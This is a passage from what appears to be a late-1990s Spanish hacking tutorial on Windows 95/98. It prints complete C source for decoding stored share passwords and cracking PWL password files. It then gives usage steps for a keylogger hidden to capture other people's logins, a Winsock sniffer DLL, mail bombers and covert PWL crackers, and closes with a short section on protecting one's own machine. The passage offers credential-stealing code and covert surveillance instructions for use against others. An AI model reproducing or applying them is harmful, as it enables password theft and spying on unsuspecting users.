  if (!DecodeCharThree(&mybytes[2])) eocc = 1;
  if (!DecodeCharFour(&mybytes[3])) eocc = 1;
  if (!DecodeCharFive(&mybytes[4])) eocc = 1;
  if (!DecodeCharSix(&mybytes[5])) eocc = 1;
  if (!DecodeCharSeven(&mybytes[6])) eocc = 1;
  if (!DecodeCharEight(&mybytes[7])) eocc = 1;

  /* If the password could be decoded, print it */
  if (eocc) printf("The encrypted password is invalid.\n");
  else {
    printf("The decoded password is: \"");
    for (i = 0; i < goupto; i++) printf("%c",mybytes[i]);
    printf("\"\n");
  }
}  /* End of main() */

/*
 * I will document this function, but not the seven other functions
 * which decode the subsequent seven characters.  All of these functions
 * are essentially the same.  Multiple functions are necessary though
 * because each column of the password has a different set of encoding
 * patterns.
 *
 * The following section will attempt to explain the encoding scheme
 * for share passwords as stored in the Windows 95 registry.  I will
 * try to explain this as clearly as I can, however I really have no
 * background in encryption.  If you have any questions, please feel
 * free to send them to me at snakey@cs.umd.edu.
 *
 * First off, share passwords can be anywhere from one character to
 * eight.  "Read only" passwords and "Full access" passwords both use
 * the same encoding scheme, and so they both can be decoded by this
 * program.  There is a one-to-one relationship between the number of
 * characters in a password and the number of bytes in the encoded
 * password stored in the registry.  In fact, each encoded byte directly
 * corresponds to the letter in the corresponding column of the
 * unencoded password!  Ie: If I change a password "passwd" to "masswd",
 * only the first byte of the encrypted password will change.  Knowing
 * this, it is easy to see that all that needs to be done to decode
 * the password is to find a mapping from an encoded byte to a decoded
 * letter.  That's what this program does.  Unfortunately, things get
 * a little tricky because a letter in the first column of a password
 * is encoded using a slightly different algorithm than a letter
 * in the second column, and so on.
 *
 * There is another complexity which we do not really need to worry
 * about to a great extent, but we still need to be aware of.  Many
 * characters, when entered into a password, map to the same encoded
 * byte.  The best example of this is that both 'A' and 'a' are the
 * same as far as share passwords are concerned.  There are numerous
 * other examples of this, and this allows us to effectively limit the
 * range of characters we need to be able to decode.  The range of
 * ASCII values we will have to be able to decode turns out to be
 * from 32 to 159.  ASCII values higher than 159 tend to map to
 * encoded bytes which also represent more normal ASCII values.  So
 * if a user manages to create a password with high ASCII values
 * in it, that password will still be decoded by this program.
 * Although the decoded password won't look the same as the original,
 * it will work just as well.
 *
 * With all of the preliminaries out of the way, I can now move on
 * to describing the mapping from an encoded byte to it's corresponding
 * ASCII value.  I think the best way to describe this would be through
 * a picture of exactly how the characters from 32 to 63 are mapped
 * out in the code for the first letter in a password.  This table goes
 * beyond the 80 column format maintained in the rest of this document,
 * but it is really the best solution.  If the table below doesn't look
 * right, load this file up in a text editor that supports greater than
 * 80 columns.
 *
 *   Encoded byte (hex)    - 1F 1E 1D 1C 1B 1A 19 18 17 16 15 14 13 14 11 10
                              0F OE 0D 0C 0B 0A 09 08 07 06 05 04 03 02 01 00
 *   ASCII value (decimal) - 42 43 40 41 46 47 44 45 34 35 32 33 38 39 36 37
                              58 59 56 57 62 63 60 61 50 51 48 49 54 55 52 53
 *   Pair #                - |_6_| |_5_| |_8_| |_7_| |_2_| |_1_| |_4_| |_3_|
                              |14_| |13_| |16_| |15_| |10_| |_9_| |12_| |11_|
 *   Quad #                - |__________2__________| |__________1__________|
                              |__________3__________| |__________4__________|
 *   32 byte block #       - |______________________________________________
                              1______________________________________________|
 *
 * The "Pair #", "Quad #", and "32 byte block #" rows each are there to
 * make the general ordering of the code more visible.  The first thing to
 * note is that the range of encoded byte values runs from 00 to 1f.  This
 * will not always be the case for the first set of 32 characters.  In
 * fact, the next set of 32 characters (ASCII 64 to ASCII 95) is not in
 * the range of 20 to 3f in encoded form.  I never concerned myself with
 * predicting exactly where each of the four 32 byte ranges are aligned
 * within the range of 0 to 256.  In my decoding scheme, I simply specify
 * the location of the first character in a 32 byte block (which I have
 * pre-determined via experimentation) and determine the locations of the
 * rest of the characters in the block relative to the inital value.  This
 * amounts to a total of four hand-decoded characters for the entire code.
 *
 * From a starting point which is given (in this case the fact that ASCII
 * 32 is encoded as 0x15), my decoding scheme follows a pattern that is
 * probably already apparent to you if you have examined the above table
 * closely.  First, if the encoded byte number is odd, it simple subtracts
 * one from this byte number to get the byte number of the encoded form of
 * the subsequent character.  This is much more simple than it sounds.
 * As an example, given that the code for ASCII 32 is 0x15, the program
 * knows that the code for ASCII 33 must be 0x14.  The tricky part is that
 * this is not always true for every code.  Recall that there is a different
 * coding scheme for each of the 8 columns in a password, and that the above
 * table only describes the coding scheme for the first column.  Other columns
 * reverse this relationship between the two ASCII values of a certain pair.
 *
 * Pairs are grouped into units of four, appearing in a predefined pattern.
 * In this case, the first pair (by first I mean the pair with the lowest
 * set of ASCII values) is put in the second slot of a quad (which contains
 * four pairs).  The second pair is put in the first slot, the third is put
 * in the fourth quad, and the fourth is put in the third quad.  This changes
 * depending on the specific code used (of the 8 possible).
 *
 * Quads also fill a block in the same manner, however the ordering is NOT
 * necessarily the same as the way pairs fit into quads!  As I described
 * above, there are four blocks, and they fit into the entire range of
 * 128 values just as pairs fit into quads and quads fit into blocks,
 * via a pattern determined by whoever invented this encoding scheme.  It
 * is important to realize that the range of 128 possible encoded
 * values can be anywhere within the range of 0 to 256.  Ie: One block can
 * be positioned from 0x00 to 0x1f, while another block in the same code
 * can be positioned from 0xa0 to 0xbf.
 *
 * I realize that the above description is a bit complex, and it doesn't
 * really cover much of _how_ my program decodes the the encoded values.
 * If you honestly can't understand a word I've said, just go back to
 * the table and really take a long look at it.  Print it out, put it
 * under your pillow when you go to sleep.  Sooner or later the order
 * of it all will dawn on you and you should be able to step through
 * my code and see how it derives its answer, at least for the
 * DecodeCharOne() routine.  Seven other tables (which I have rough
 * copies of here on notebook paper) were needed to come up with
 * the seven other decoders for the seven other character places.
 *
 */

int DecodeCharOne(unsigned char *mychar) {
  int i = 0;        /* Keeps track of the decoded character # minus 32 */
  int cletter = 1;  /* Sets the current letter of the 8 char quad */
  int blockl1 = 1;  /* Sets the current quad */
  int blockl2 = 1;  /* Sets the current 32 char block */
  int retval = 1;
  /* We are on this col of the table: */
  unsigned char code = 0x15;    /* The code for a space */
  
  /* This is the main loop.  It walks through each decoded character, finds
   * its corresponding encoded value, and looks to see if that's the same as
   * the encoded value we are looking for.  If it is, we have found our
   * decoded character!
   */
  while((i<256) && (code != *mychar)) {
    switch (cletter) {
    case 1:
      code--;
      cletter++;
      break;
    case 2:
      code += 3;
      cletter++;
      break;
    case 3:
      code--;
      cletter++;
      break;
    case 4:
      code -= 5;
      cletter++;
      break;
    case 5:
      code--;
      cletter++;
      break;
    case 6:
      code+=3;
      cletter++;
      break;
    case 7:
      code--;
      cletter++;
      break;
    case 8:
      cletter = 1;
      switch (blockl1) {    /* After we hit character number 8, we have */
      case 1:               /* to do a relative jump to the next quad */
	code += 11;
	blockl1++;
	break;
      case 2:
	code -= 21;
	blockl1++;
	break;
      case 3:
	code += 11;
	blockl1++;
	break;
      case 4:
	blockl1 = 1;
	switch (blockl2) {       /* After we hit the last quad, we have to */
	case 1:                  /* jump to the next 32 character block. */
	  code = 0x75;
	  blockl2++;
	  break;
	case 2:
	  code = 0x55;
	  blockl2++;
	  break;
	case 3:
	  code = 0xb5;
	  blockl2++;
	  break;
	case 4:
	  code = 0x15;
	  blockl2 = 1;
	  break;
	}
	break;
      }
      break;
    }
    i++;
  }
  if (i == 256) retval = 0;
  else *mychar = i + 32;
  return retval;
}  /* End of DecodeCharOne() */

int DecodeCharTwo(unsigned char *mychar) {
  int i = 0;
  int cletter = 1;
  int blockl1 = 1;
  int blockl2 = 1;
  int retval = 1;
  unsigned char code = 0xba;    /* The code for a space */
  while((i<256) && (code != *mychar)) {
    switch (cletter) {
    case 1:
      code++;
      cletter++;
      break;
    case 2:
      code -= 3;
      cletter++;
      break;
    case 3:
      code++;
      cletter++;
      break;
    case 4:
      code += 5;
      cletter++;
      break;
    case 5:
      code++;
      cletter++;
      break;
    case 6:
      code -= 3;
      cletter++;
      break;
    case 7:
      code++;
      cletter++;
      break;
    case 8:
      cletter = 1;
      switch (blockl1) {
      case 1:
      	code -= 11;
	blockl1++;
	break;
      case 2:
	code -= 11;
	blockl1++;
	break;
      case 3:
	code -= 11;
	blockl1++;
	break;
      case 4:
	blockl1 = 1;
	switch (blockl2) {
	case 1:
	  code = 0xda;
	  blockl2++;
	  break;
	case 2:
	  code = 0xfa;
	  blockl2++;
	  break;
	case 3:
	  code = 0x1a;
	  blockl2++;
	  break;
	case 4:
	  code = 0xba;
	  blockl2 = 1;
	  break;
	}
	break;
      }
      break;
    }
    i++;
  }
  if (i == 256) retval = 0;
  else *mychar = i + 32;
  return retval;
}  /* End of DecodeCharTwo() */

int DecodeCharThree(unsigned char *mychar) {
  int i = 0;
  int cletter = 1;
  int blockl1 = 1;
  int blockl2 = 1;
  int retval = 1;
  unsigned char code = 0x6d;    /* The code for a space */
  while((i<256) && (code != *mychar)) {
    switch (cletter) {
    case 1:
      code--;
      cletter++;
      break;
    case 2:
      code += 3;
      cletter++;
      break;
    case 3:
      code--;
      cletter++;
      break;
    case 4:
      code -= 5;
      cletter++;
      break;
    case 5:
      code--;
      cletter++;
      break;
    case 6:
      code += 3;
      cletter++;
      break;
    case 7:
      code--;
      cletter++;
      break;
    case 8:
      cletter = 1;
      switch (blockl1) {
      case 1:
        code -= 5;
        blockl1++;
	break;
      case 2:
        code += 27;
        blockl1++;
        break;
      case 3:
        code -= 5;
        blockl1++;
        break;
      case 4:
	blockl1 = 1;
	switch (blockl2) {
	case 1:
	  code = 0x0d;
	  blockl2++;
	  break;
	case 2:
          code = 0x2d;
          blockl2++;
          break;
	case 3:
          code = 0xcd;
          blockl2++;
          break;
	case 4:
	  code = 0x6d;
	  blockl2 = 1;
          break;
	}
	break;
      }
      break;
    }
    i++;
  }
  if (i == 256) retval = 0;
  else *mychar = i + 32;
  return retval;
}  /* End of DecodeCharThree() */

int DecodeCharFour(unsigned char *mychar) {
  int i = 0;
  int cletter = 1;
  int blockl1 = 1;
  int blockl2 = 1;
  int retval = 1;
  unsigned char code = 0x86;    /* The code for a space */
  while((i<256) && (code != *mychar)) {
    switch (cletter) {
    case 1:
      code++;
      cletter++;
      break;
    case 2:
      code -= 3;
      cletter++;
      break;
    case 3:
      code++;
      cletter++;
      break;
    case 4:
      code -= 3;
      cletter++;
      break;
    case 5:
      code++;
      cletter++;
      break;
    case 6:
      code -= 3;
      cletter++;
      break;
    case 7:
      code++;
      cletter++;
      break;
    case 8:
      cletter = 1;
      switch (blockl1) {
      case 1:
        code += 13;
        blockl1++;
	break;
      case 2:
        code += 13;
        blockl1++;
        break;
      case 3:
        code += 13;
        blockl1++;
        break;
      case 4:
	blockl1 = 1;
	switch (blockl2) {
	case 1:
          code = 0xe6;
          blockl2++;
	  break;
	case 2:
          code = 0xc6;
          blockl2++;
          break;
	case 3:
          code = 0x26;
          blockl2++;
          break;
	case 4:
	  code = 0x86;
          blockl2 = 1;
          break;
	}
	break;
      }
      break;
    }
    i++;
  }
  if (i == 256) retval = 0;
  else *mychar = i + 32;
  return retval;
}   /* End of DecodeCharFour() */

int DecodeCharFive(unsigned char *mychar) {
  int i = 0;
  int cletter = 1;
  int blockl1 = 1;
  int blockl2 = 1;
  int retval = 1;
  unsigned char code = 0x73;    /* The code for a space */
  while((i<256) && (code != *mychar)) {
    switch (cletter) {
    case 1:
      code--;
      cletter++;
      break;
    case 2:
      code--;
      cletter++;
      break;
    case 3:
      code--;
      cletter++;
      break;
    case 4:
      code += 7;
      cletter++;
      break;
    case 5:
      code--;
      cletter++;
      break;
    case 6:
      code--;
      cletter++;
      break;
    case 7:
      code--;
      cletter++;
      break;
    case 8:
      cletter = 1;
      switch (blockl1) {
      case 1:
        code += 7;
	blockl1++;
	break;
      case 2:
        code -= 25;
        blockl1++;
        break;
      case 3:
        code += 7;
	blockl1++;
        break;
      case 4:
	blockl1 = 1;
	switch (blockl2) {
	case 1:
          code = 0x13;
          blockl2++;
	  break;
	case 2:
          code = 0x33;
          blockl2++;
          break;
	case 3:
          code = 0x23;
          blockl2++;
	  break;
	case 4:
	  code = 0x73;
          blockl2 = 1;
          break;
	}
	break;
      }
      break;
    }
    i++;
  }
  if (i == 256) retval = 0;
  else *mychar = i + 32;
  return retval;
}    /* End of DecodeCharFive() */

int DecodeCharSix(unsigned char *mychar) {
  int i = 0;
  int cletter = 1;
  int blockl1 = 1;
  int blockl2 = 1;
  int retval = 1;
  unsigned char code = 0x89;    /* The code for a space */
  while((i<256) && (code != *mychar)) {
    switch (cletter) {
    case 1:
      code--;
      cletter++;
      break;
    case 2:
      code += 3;
      cletter++;
      break;
    case 3:
      code--;
      cletter++;
      break;
    case 4:
      code += 3;
      cletter++;
      break;
    case 5:
      code--;
      cletter++;
      break;
    case 6:
      code += 3;
      cletter++;
      break;
    case 7:
      code--;
      cletter++;
      break;
    case 8:
      cletter = 1;
      switch (blockl1) {
      case 1:
        code -= 13;
	blockl1++;
	break;
      case 2:
	code += 19;
        blockl1++;
	break;
      case 3:
        code -= 13;
	blockl1++;
	break;
      case 4:
	blockl1 = 1;
	switch (blockl2) {
	case 1:
          code = 0xe9;
	  blockl2++;
	  break;
	case 2:
          code = 0xc9;
	  blockl2++;
	  break;
	case 3:
          code = 0x29;
	  blockl2++;
	  break;
	case 4:
	  code = 0x89;
          blockl2 = 1;
          break;
	}
	break;
      }
      break;
    }
    i++;
  }
  if (i == 256) retval = 0;
  else *mychar = i + 32;
  return retval;
}     /* End of DecodeCharSix() */

int DecodeCharSeven(unsigned char *mychar) {
  int i = 0;
  int cletter = 1;
  int blockl1 = 1;
  int blockl2 = 1;
  int retval = 1;
  unsigned char code = 0xf4;    /* The code for a space */
  while((i<256) && (code != *mychar)) {
    switch (cletter) {
    case 1:
      code++;
      cletter++;
      break;
    case 2:
      code++;
      cletter++;
      break;
    case 3:
      code++;
      cletter++;
      break;
    case 4:
      code -= 7;
      cletter++;
      break;
    case 5:
      code++;
      cletter++;
      break;
    case 6:
      code++;
      cletter++;
      break;
    case 7:
      code++;
      cletter++;
      break;
    case 8:
      cletter = 1;
      switch (blockl1) {
      case 1:
        code += 9;
	blockl1++;
	break;
      case 2:
	code -= 23;
        blockl1++;
	break;
      case 3:
        code += 9;
	blockl1++;
	break;
      case 4:
	blockl1 = 1;
	switch (blockl2) {
	case 1:
          code = 0x94;
	  blockl2++;
	  break;
	case 2:
          code = 0xb4;
	  blockl2++;
	  break;
	case 3:
          code = 0x54;
	  blockl2++;
	  break;
	case 4:
	  code = 0xf4;
          blockl2 = 1;
          break;
	}
	break;
      }
      break;
    }
    i++;
  }
  if (i == 256) retval = 0;
  else *mychar = i + 32;
  return retval;
}   /* End of DecodeCharSeven() */

int DecodeCharEight(unsigned char *mychar) {
  int i = 0;
  int cletter = 1;
  int blockl1 = 1;
  int blockl2 = 1;
  int retval = 1;
  unsigned char code = 0x4a;    /* The code for a space */
  while((i<256) && (code != *mychar)) {
     switch (cletter) {
     case 1:
       code++;
       cletter++;
       break;
     case 2:
       code -= 3;
       cletter++;
       break;
     case 3:
       code++;
       cletter++;
       break;
     case 4:
       code += 5;
       cletter++;
       break;
     case 5:
       code++;
       cletter++;
       break;
     case 6:
       code -= 3;
       cletter++;
       break;
     case 7:
       code++;
       cletter++;
       break;
     case 8:
       cletter = 1;
       switch (blockl1) {
       case 1:
	 code -= 11;
	 blockl1++;
	 break;
       case 2:
	 code += 21;
	 blockl1++;
	 break;
       case 3:
	 code -= 11;
	 blockl1++;
	 break;
       case 4:
	 blockl1 = 1;
	 switch (blockl2) {
	 case 1:
	   code = 0x2a;
	   blockl2++;
	   break;
	 case 2:
	   code = 0x0a;
	   blockl2++;
	   break;
	 case 3:
	   code = 0xea;
	   blockl2++;
	   break;
	 case 4:
	   code = 0x4a;
	   blockl2 = 1;
	   break;
	 }
	 break;
       }
       break;
     }
     i++;
  }
  if (i == 256) retval = 0;
  else *mychar = i + 32;
  return retval;
}    /* End of DecodeCharEight() */

/* End of program */

------------ FIN -------------------------------------------------------------

   Cuando ejecutemos el programa nos saldra esto:

   c:\>sharepw
   Input the byte code in hex (ex: 76 d5 09 e3):

   Nos pide que introduzcamos el password en formato Hexadecimal. Hay muchas
   tablas por Internet para aquellos que no tengan una.

   5-6. Snadboy's revelation v1.1.

  En este apartado hablare sobre una interesante herramienta. El Snadboy es
  una tool que nos descripta los astericos de la tipica ventana que pide
  password. Si hay una ventana con un password y que no entendemos porque
  solo salen asteriscos, lo que tenemos que hacer es abrir el Snadboy y
  situarnos al lado de la ventana de password, la ventana del Snadboy tiene
  una "mira de punto", pinchamos encima de la mira y la arrastramos con el
  raton sobre la ventana del password situandonos encima del password,
  soltamos y en la ventana del Snadboy veremos el password descifrado.

  Como nota, este programa para lo que hace, ocupa mucho en el disco duro,por
  lo que puede ser un poco sospechoso o que los coders no lo han optimizado
  demasiado que digamos.

   5-7. Keylog95.

  Este programa nos sera muy util en sitio donde halla mucha gente, ya que
  es un Key recoder, o sea, una pequea utilidad que se queda residente
  en memoria y graba todos los logins y password que la gente vaya metiendo.

  El programa es de sencillo manejo, pero tiene que haver unos pequeos
  requisitos, primero tener las librerias VBRUN300.DLL y QPRO200.DLL en el
  directorio c:\windows\system y ademas tener un directorio llamado c:\win,
  ya que es alli donde el programa grabara la informacion que obtenga, en
  un fichero llamado "logx", por lo que esto quedara:

  c:\win\logx

  Cuando las librerias esten metidas en el directorio System, windows creara
  un icono en la carpeta de Inico, por lo que es conveniente darle un
  atributo de Minimizado para que nadie lo pueda ver y asi siempre que se
  arranque Windows tambien lo hara el Keylog95 :)

   5-8. Glide.

  El Glide es otro programa que sirve para desencriptar un password's en
  Win95/98. Al igual que el Sharepw solo lo tenemos que compiLar y ejecutar
  con la salvedad que esta escrito en C++.

------------ Codigo Fuente ---------------------------------------------------

#include <stdio.h>
#include <string.h>
#include <process.h>
#include <stdlib.h>
#include <ctype.h>
#include <conio.h>

unsigned char huge Data[100001];
unsigned char keystream[1001];
int Rpoint[300];

void main (int argc,char *argv[]) {
	FILE *fd;
	int 	i,j,k;
	int	size;
	char ch;
	char *name;
	int cracked;
	int sizemask;
	int maxr;
	int rsz;
	int pos;
	int Rall[300]; /* recource allocation table */


	if (argc<2) {
		printf("usage: glide filename (username)");
		exit(1);
	}

	/* read PWL file */

	fd=fopen(argv[1],"rb");
	if(fd==NULL) {
		printf("can't open file %s",argv[1]);
		exit(1);
	}
	size=0;
	while(!feof(fd)) {
		Data[size++]=fgetc(fd);
	}
	size--;
	fclose(fd);

	/* find username */
	name=argv[1];
	if(argc>2) name=argv[2];
	printf("Username: %s\n",name);

	/* copy encrypted text into keystream */
	cracked=size-0x0208;
	if(cracked<0) cracked=0;
	if(cracked>1000) cracked=1000;
	memcpy(keystream,Data+0x208,cracked );

	/* generate 20 bytes of keystream */
	for(i=0;i<20;i++) {
		ch=toupper(name[i]);
		if(ch==0) break;
		if(ch=='.') break;
		keystream[i]^=ch;
	};
	cracked=20;


	/* find allocated recources */

	sizemask=keystream[0]+(keystream[1]<<8);
	printf("Sizemask: %04X\n",sizemask);

	for(i=0;i<256;i++) Rall[i]=0;

	maxr=0;
	for(i=0x108;i<0x208;i++) {
		if(Data[i]!=0xff) {
			Rall[Data[i]]++;
			if (Data[i]>maxr) maxr=Data[i];
		}
	}
        maxr=(((maxr/16)+1)*16);      /* recource pointer table size appears
                                         to be divisable by 16 */

	/* search after recources */

	Rpoint[0]=0x0208+2*maxr+20+2;	/* first recource */
	for(i=0;i<maxr;i++) {
		/* find size of current recource */
		pos=Rpoint[i];
		rsz=Data[pos]+(Data[pos+1]<<8);
		rsz^=sizemask;
		printf("Analyzing block with size: %04x\t(%d:%d)\n",rsz,i
                ,Rall[i]);
		if( (Rall[i]==0) && (rsz!=0) ) {
			printf("unused resource has nonzero size !!!\n");
			printf("If last line produced any : You
                        may try to recover\n");
			printf("press y to attempt recovery\n");
			ch=getch();
			if(ch!='y') exit(0);
			rsz=2;
			i-=1;
		}

		pos+=rsz;

		/* Resources have a tendency to have the wrong size for
                some reason */
		/* check for correct size */

		if(i<maxr-1) {
			while(Data[pos+3]!=keystream[1]) {
				printf(":",Data[pos+3]);
				pos+=2; /* very rude may fail */
			}
		}

		pos+=2;	/* include pointer in size */
		Rpoint[i+1]=pos;
	}
	Rpoint[maxr]=size;

	/* insert Table data into keystream */
	for(i=0;i <= maxr;i++) {
		keystream[20+2*i]^=Rpoint[i] & 0x00ff;
		keystream[21+2*i]^=(Rpoint[i] >> 8) & 0x00ff;
	}
	cracked+=maxr*2+2;

	printf("%d bytes of keystream recovered\n",cracked);

	/* decrypt resources */
	for(i=0;i < maxr;i++) {
               rsz=Rpoint[i+1]-Rpoint[i];
               if (rsz>cracked) rsz=cracked;
               printf("Recource[%d] (%d)\n",i,rsz);
               for(j=0;j<rsz;j++) printf("%c",Data[Rpoint[i]+j]^keystream[j]);
               printf("\n");
	}
	exit(0);
}

------------ FIN -------------------------------------------------------------

   Cuando lo ejecutemos nos saldra lo siguiente:

   c:\>glide
   usage: glide filename (username)

   Pidiendo el fichero y el login.

   5-9. Win95 anonymail v 1.0.

  Este sencillo programa nos sera de gran ayuda para enviar mail anonimo.
  Cuando ejecutemos el programa nos saldra una ventana con los siguientes
  campos:

  Host

  From

  To

  Subject

  Solo tenemos que rellenarlos correctamente y pulsar el "send" para enviar
  el mail anonimo y cuando hayamos acabado pulsar "quit".

  Un programa muy sencillo que nos puede ser util. Como nota, el autor nos
  advierte que nadie le envie mail anonimo con su programa, por lo que se
  puede deducir que es un farol o que el programa no es tan anonimo, por
  lo que el autor le habra metido un troyano.

   5-10. Hacker's Utility, V 1.02.

  Este magnifico programa es una suite para Hackers. Para que nos entendamos,
  este programa esta compuesto por muchos otros programas y asi dispones
  de un paquete perfecto para un Hacker.

  Cuando ejecutamos este programa nos aparecera una ventana con un menu
  arriba, y cuando abramos una de estas opciones se abrira otra ventana
  con mas opciones. Ahora podemos ver el menu principal compuesto por
  los submenus:

   File -> HU setup, exit

   Cracking -> crack passwords -> crack zip passwords
                                  crack passwd files
                                  passwd jackpot
               words prcessing -> words wizard
                                  xtrakt words
                                  sort

   Tools -> create & fill a dummy fill, compare binary files

   Network -> finger, port scanner, ip <> name converter

   Other Stuff -> hackers's test, serial numbers, extracting/ripping sound
                  files, extracting/ripping graphic files, manual extract/
                  rip files

   System -> dos prompt, run custom application, shut down

   Window -> cascade, tile horizontal, tile vertical, arrange icons,
             main toolbar, main status bar

   Help -> tip of day, index, using help, about Hacker's Utility
   
  La verdad es que esta suite esta muy completa y nos sera de gran ayuda. Por
  ejemplo el sistema se puede configurar en File->HU setup para que sea mas
  personal. Cabe destacar ciertas utilidades como los crackeadores que tiene
  incorporados para crackear el passwd de un Unix o romper el password de
  un fichero zip. Luego en la seccion de Network, las utilidades nos seran
  de mucha ayuda, como el Finger, el scaneador de puertos y el convertidor
  de direcciones IP. Esto en mi opion seria lo mejor del programa pero
  luego trae otras cosas que tambien nos pueden servir para al menos
  divertinos un rato, esto es el caso del Hacker's Test, por ejemplo podemos
  activar el Port Scanner y mientras esperamos a los resultados podemos
  hacer un test para saber si somos buenos Hackers.

  La verdad es que es una magnifica herramienta que los Hackers de win deben
  tener.

   5-11. Haktek v1.1.

  AL igual que el HU, Haktek, es una suite que tambien nos sera de gran
  ayuda. Pero esta suite esta mas enfocada a atacar por Internet, logicamente
  con el peligro que ello conlleva.

  Al ejecutar el programa, se abrira una ventana en la que veremos una serie
  de iconos en la parte izquierda de la ventana y una pantalla de texto que
  nos explica cada icono. Empezando de arriba para abajo:

  Diskette-> graba la sesion (lo que esta en pantalla y lo que hallamos hecho
             con el programa).

  X -> prepara la sesion, borrando la pantalla de texto.

  ? -> nos habla sobre sus autores.

  Circulo -> sealos un objetivo, por defecto www.microsoft.com.

  Antena -> Utilidad ping.

  Gafas -> scaneador de puertos.

  Bomba -> bombardeador de correo.

  Stop bomb -> para protegernos de un mailbomber.

  Radio -> scaneador de IP'S.

  Prismaticos -> para enviar finger nulos.

  La verdad es que es una suite muy completa y nos ayudara a joder a todo
  el que se ponga por delante. Con un poco de practica dominaremos este
  programa a la perfeccion.

   5-12. Claymore Brute Force.

  Esta utlidad no sera de gran ayuda para desemcriptar passowrd's de un
  fichero passwd de Unix. Cuando lo ejecutemos se abrira una ventana con
  varias opciones, de facil manejo, para aquellos que quieren algo simple y
  corriendo sobre win95. Este crackeador es de fuerza bruta pudiendo ser
  algo lento.

   5-13. Skream's Port Listener V 2.3.

  En muchas ocasiones nos gustaria saber que pasa en nuestros puertos, esta
  simple pero estupenda herramienta nos sera muy util, ya que la podemos
  ejecutar y configurarla para que escuche en el puerto que queramos, asi
  podemos saber quien o que esta conectado a nuestros puertos. Por defecto
  el programa escucha en el puerto 139 (os suena?)

  El programa nos permite escuchar en el puerto que querramos, ademas podemos
  logear todo el proceso en un fichero.

   5-14. WSOCK32 Winsock Spy Facility Version .91

  Podemos usar esta DLL para espiar un sistema informatico, ya que es un
  sniffer :), solo funciona en Win95/98. No es dificil de utilizar, los pasos
  a seguir son:

  #1- Copiar el WSOCK32.DLL y ubicarlo en el directorio del programa que
      querramos espiar.

  #2- Configurar las siguientes variables:

    > SET WSOCK_LOG=LOG
    > SET WSOCK_FLAGS=s

  #3- Normalmente Windows instala el estandar WSOCK32.DLL en la siguiente ruta
      C:\WINDOWS\SYSTEM\WSOCK32.DLL por eso debemos configurar el path de
      nuestra DLL, en el lugar donde este de la siguiente manera:

    > SET WSOCK_PATH=<el path de nuestro WSOCK32.DLL>

  #4- Ejecutar el programa WinSock.

  #5- Recibiras un mensaje que esta logeando.

  #6- Ya puedes salir del programa.

  #7- Busca un fichero llamado LOG.XXX donde las XXX son tres digitos en
      hexadecimal.

  #8- El fichero Log contendra toda la sesion del Winsock :)

  El programa dispone de mas opciones de configuracion, que podemos ver como
  usar leyendo la estupenda documentacion de trae. Ahora ya no tenemos excusa
  alguna de que no podemos pillar "informacion sensible." 

   5-15. PWlTool V 4.0.

  Podemos usar esta herramienta para desencriptar los famosos pwl's. La verdad
  es que es una herramienta muy interesante y potente. Al ejecutar el programa
  nos aparecera una ventana con multitud de opciones, incluso el nombre del
  usuario que estemos usando en el momento.

  El programa nos permite buscar passwords (o sea ficheros pwl's), ademas
  tambien comprueba a los usuarios. El programa lo podemos dejar en modo
  zombie, eso significa que trabaja en background y no nos daremos cuenta que
  esta desencriptando los passwords, ademas es el modo que se recomienda
  utilizar.

  Es una herramienta de considero bastante completa y vital para todo aquel
  hacker de Windows.

   5-16. PwlView V 1.01.

  Volvemos con otro programa para averiguar los ficheros pwl's :) Ejecutamos
  el siguiente fichero :

  c:\>pwlview
  There is no security in this crazy world!
  Win95 PWL viewer v1.01 (c) 1997, 98 Vitas Ramanchauskas
  http://webdon.com, e-mail:vitas@webdon.com vitas@rocketmail.com, ICQ:3024702

  ************
  !DISCLAIMER!
  !This program intended to be used for legal purpose only!
  ************

  This program shows cached passwords using standard (but undocumented)
  Windows API on local machine for current user (user must be logged in).
  There is much more powerful version of this program named pwltool
  is available at http://webdon.com/vitas . But it has larger size...
  You may invoke pwlview in this way: pwlview >> textfile.txt
  to save passwords in file (don't forget to press enter twice)
  Press Enter to begin...

  Y este es el mensaje que nos saca, el programa esta esperando a que pulsemos
  el "boton cualquiera" para buscar los pwl's, ahora aprieto el boton y me
  sale lo siguiente:

  No passwords found.
  Probably password caching was not used or user is not logged in.

  Press Enter to quit

  En mi caso sale negativo, debido a que no tengo ningun fichero pwl's :) Otro
  programa que nos conviene tener en nuestras coleccion de herramientas.

  6. Medidas De Seguridad.

  En esta seccion hablare sobre varios aspectos muy importanes, logicamente
  la seguridad personal, de nuestro ordenador, etc... Para que nadie pueda
  jodernos aunque nos movamos por Win95/98.

   6-1. Protegiendo Nuestro Ordenador.

  Nuestro ordenador corriendo con Win95/98, sera propenso a muchos tipos de
  ataques diferentes. Por ello conviene estar preparado y sobre estar
  alerta sobre las nuevas cosas que surgen por el mundo Underground, el mejor
  medio son los e-zines y por supuesto buenos amigos por el IRC.

    6-1-1. Ataques Tipicos a Nuestro Windows.

  Logicamente seremos muy propensos a ataques tipo DoS (denial of service),
  como son el LAND, BONK, TEARDROP y por supuesto los famosos nukes, OOB,
  etc ...

  Para estar protegidos lo que tenemos que hacer es pasarnos por los
  web's de seguridad o el de la casa Microsoft en los cuales se cuelgan
  los parches de estos ataques. No siempre funcioran pero nos ahorraran
  muchos disgustos en muchos casos. La gente suele ser muy propensa a estas
  cosas porque no esta informada sobre estos ataques y por consiguiente
  no se instala los parches correspondientes.

    6-1-2. Encriptacion de Nuestra Informacion.

  La informacion sensible que tengamos en nuestro disco duro conviene que
  este encriptada con algun buen programa de encriptacion del tipo PGP, el
  cual no puede ser roto en estos tiempos.

  Tambien podemos hacer uso de la Stereografia, el arte de ocultar la
  informacion. Hay varios programas en Internet que nos permiten esconder
  ficheros de txt en ficheros graficos o de sonido, por supuesto habra
  que tener cuidado cuando hacemos estas operaciones, debido a la diferencia
  de formatos entre los ficheros.

  Incluso podemos encriptar todo o parte del disco duro para mayor seguridad
  en nuestros datos.

  Lo recomendado es usar el PGP 5.0 o incluso la version 6, las cuales nos
  seran de gran utilidad para encriptar nuestros ficheros ademas como son
  para Windows todo sera por las tipicas ventanas, mas facil imposible.

    6-1-3. Eliminar Informacion De Forma Segura.

  Cuando borramos un fichero del disco duro, realmente no esta borrado, por
  lo que puede ser rescatado mediante herramientas especiales. Esto no
  es conveniente si por el caso nuestro ordenador cae en malos manos y nos
  ha dado tiempo a borrar algunos ficheros, no serviria de nada ya que
  podrian recuperar la informacion.

  Para borrar ficheros que contegan informacion muy privada o no queremos
  que nadie la pueda obtener, conviene borrar este fichero mediante algun
  programa especial para el borrado de ficheros. Existen por Internet
